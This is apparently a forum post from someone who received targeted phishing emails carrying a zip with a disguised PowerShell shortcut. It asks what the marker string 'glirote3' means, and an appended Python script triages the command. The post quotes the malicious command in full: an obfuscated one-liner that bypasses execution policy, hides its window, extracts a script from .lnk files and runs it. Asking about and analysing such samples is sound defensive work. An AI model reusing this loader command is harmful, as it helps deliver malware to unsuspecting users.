Has anyone any ideas what "glirote3" -- malware powershell link.
Over the last couple of weeks I have received a couple of targeted emails with links to a zip file which contains a shortcut and a png file. When I say targeted, they have my name and the main office telephone number along with postcode (i.e. zip code). Each email claims to be an order confirmation. The png file for some reason is marked as hidden, and the shortcut is actually a PowerShell link.

The link (reported to GoDaddy so may go soon hopefully) is:


The shortcut powershell command is:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no

Is anyone aware what glirote3 is, as I am not turning up any references from a quick search?
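
Added example, not part of the original post: a Python triage of the shortcut command quoted above that strips the quote characters splitting its keywords and reports what the de-obfuscated command does. The function names and finding labels are hypothetical, and stripping backticks and carets as well as quotes goes beyond the quoting seen in this sample.

```python
import re

# Command string copied from the shortcut quoted in the post above.
SAMPLE = r'''C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no'''


def normalize(cmd):
    """Drop quote, backtick and caret characters used to split keywords."""
    return re.sub(r"[\"'`^]", "", cmd)


def triage(cmd):
    """Return heuristic findings for a shortcut command line (hypothetical labels)."""
    norm = normalize(cmd)
    report = {"normalized": norm, "findings": [], "marker": None, "dropped": None}

    if re.search(r"-(?:ep|executionpolicy)\s+bypass", norm, re.I):
        report["findings"].append("execution-policy-bypass")
    if re.search(r"-w(?:in(?:dowstyle)?)?\s+hidden", norm, re.I):
        report["findings"].append("hidden-window")

    # findstr searching .lnk files: lines carrying the marker string are
    # pulled out of shortcut files, so the marker tags embedded content.
    m = re.search(r"findstr\s+(?:/\S+\s+)*(\S+)\s+\S*\.lnk\b", norm, re.I)
    if m:
        report["findings"].append("findstr-over-lnk")
        report["marker"] = m.group(1)

    # Output redirected into a .ps1 file that the same command then references again.
    d = re.search(r">\s*(\S+\.ps1)\b", norm, re.I)
    if d:
        report["dropped"] = d.group(1)
        report["findings"].append("writes-ps1")
        if norm.count(d.group(1)) > 1:
            report["findings"].append("runs-dropped-ps1")
    return report


if __name__ == "__main__":
    result = triage(SAMPLE)
    print(result["normalized"])
    print("findings:", ", ".join(result["findings"]))
    print("marker:", result["marker"], "| dropped script:", result["dropped"])
```

On the quoted command this reports that the marker string is the search term findstr uses to pull lines out of .lnk files under the user profile into Downloads\vvv.ps1, which the command then runs.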
